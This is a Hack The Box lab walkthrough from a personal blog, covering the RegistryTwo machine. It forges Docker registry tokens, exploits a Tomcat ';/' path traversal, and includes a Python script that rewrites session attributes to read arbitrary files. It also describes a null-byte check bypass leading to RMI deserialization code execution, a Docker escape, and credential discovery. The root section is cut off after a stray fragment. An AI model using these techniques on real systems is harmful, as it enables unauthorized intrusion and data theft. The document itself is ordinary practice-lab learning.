๐Ÿ’€
Samfisher blog
  • Common Vulnerabilities and Exposures
    • ๐ŸงบCVE-2023-27163
    • ๐Ÿ›ค๏ธMaltrail - OS Command Injection
  • ๐Ÿ‘พCrafty - HTB
  • ๐ŸŒŒSkyfall - HTB
  • ๐Ÿ”ขRegistryTwo - HTB
  • โฌ‡๏ธDownload - HTB
  • โ˜ ๏ธCybermonday - HTB
  • ๐Ÿ€Rebound - HTB
  • ๐Ÿ‘จโ€๐Ÿ’ผOffice - HTB
  • Wave - FlagYard
  • Blackhat - Saudi <Web> iFrame
Powered by GitBook
On this page

RegistryTwo - HTB

https://app.hackthebox.com/machines/552

PreviousSkyfall - HTBNextDownload - HTB

Last updated 1 year ago

First of all, I won't go into deep detail for every step. Sometimes I'll skip certain aspects, but my focus will be on delivering the exploit, vulnerability, and how to exploit them efficiently. This will be a quick and concise writeup."

#Foothold

First lets start with port 5001

With fuzzing the web dirs ,we can find /auth

you can refer back to the docker registry documentation HERE for further details

also specifically HERE will tell you what to do with the token ,but first it required more modifications in order to access the docker registry image and pull it.

"token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6IlFYNjY6MkUyQTpZT0xPOjdQQTM6UEdRSDpHUVVCOjVTQk06UlhSMjpUSkM0OjVMNFg6TVVZSjpGSEVWIn0.eyJpc3MiOiJBY21lIGF1dGggc2VydmVyIiwic3ViIjoiIiwiYXVkIjoiIiwiZXhwIjoxNjkxMTk1MzMwLCJuYmYiOjE2OTExOTQ0MjAsImlhdCI6MTY5MTE5NDQzMCwianRpIjoiNzI2OTY2MzEyOTQ3MjA0MTI5NyIsImFjY2VzcyI6W119.bgtox4TBEcH_MuNR603paF72sKCIguXsBVKQplZDOqiokMqlEuizFpte4vqlfX_oVNwE_3xh4kU1Y7CERUsVzN8JMMbccgTV-95F1TVwnc1hoYe1w-6rSvHINHi-cGurHSirahbpxQy9iTc1VBNawx2m2sLTRQdFe7E-TTHSdaF0OwDYwtALmW2sCNc9quhRPkbi4c0YusJP0UYajt35WWfJnPbWtlDHlVrttsqvjHWEAQn29CpkvrKFrTI78VfzbVcYyZAoTGnWbqgGDtSLPccn7eyVeJlyTsfwY6gcHkuywi6LUEV7pEZ-R28hhQkBu4eb4EuJgcvLJNOciUTTqA"

As per documentation we also need :

Www-Authenticate:

To craft your own token ,we used this added URL scope as the documentation suggest to access _catalog

https://webhosting.htb:5001/auth?service=Docker%20registry&scope=registry:catalog:*

Craft another token to get hosting-app image information https://webhosting.htb:5001/auth?service=Docker%20registry&scope=repository:hosting-app:pull

Reading the image information will gives you a clue what web app they are using and alot of other information to find your way for the user foothold

Now we move to Port 443

Register with a new user then login

as we know previously they are using tomcat v9.0.2 ,referring to HERE we find that website is vulnerable to Path Traversal (..;/)

Now we are able to access the application manager

Now we are able to access the example scripts which we can modify token sessions to access unavailable things

as you can see (s_EditingMedia_{tmpID}) ,u can get {tmpID} by creating a domain then try to write/edit the file index.html or any created file

i have automated the process by creating this simple python script

import requests

url_post = 'https://www.webhosting.htb/hosting/..;/examples/servlets/servlet/SessionExample'

user_input = input("File PATH: ")

headers_post = {
    # Add the required headers here, including the 'Cookie' header
    'Cookie': 'JSESSIONID={cookie}',
    'Content-Type': 'application/x-www-form-urlencoded',
}

data = {
    'dataname': 's_EditingMedia_{tmpID}',
    'datavalue': user_input
}

# Disable SSL certificate verification by setting verify=False
response_post = requests.post(url_post, headers=headers_post, data=data, verify=False)

# Check the response status code
if response_post.status_code == 200:
    print("Request was successful.")
else:
    print(f"Request failed with status code: {response_post.status_code}")

just make sure to change {cookie} + {tmpID} to yours ,after you get successfully respond ,you can refresh the tmpID page to see the file ,also note you are able to modify the file with what ever you want if you have write access to that file.

now we can get the hosting.war that we found in previous docker registry image that we pulled

/usr/local/tomcat/webapps/hosting.war

view the webpage source ,and scroll down to ' value=atob(`{BASE64}`)

try to just get the {base64} and remove the rest ,and use base64 -d to > hosting.war file

after reading the source code ,we know we can set manager role

adding &rmi.host={ip} and %00.htb to bypass the check

now we have to request anything through our created domain to trigger the RMI

i used ermir tool ,and make sure your current java version is 11 in order for the payload and exploit to work, u can use below commands to list/change your java version

update-java-alternatives --list
update-java-alternatives --set java-1.11.0-openjdk-amd64

#Docker Escape

after enumeration ,we can actually interact with the RMI server again to escape the docker

you will find all used tools in my repository

i brute force developer folder using Sec-List/Discovery/Web-Content/dirsearch.txt

and found a hidden file contain credentials

#Root - Privilege Escalation

za

๐Ÿ”ข
  • #Foothold
  • #Docker Escape
LogoGitHub - Envincion/toolsGitHub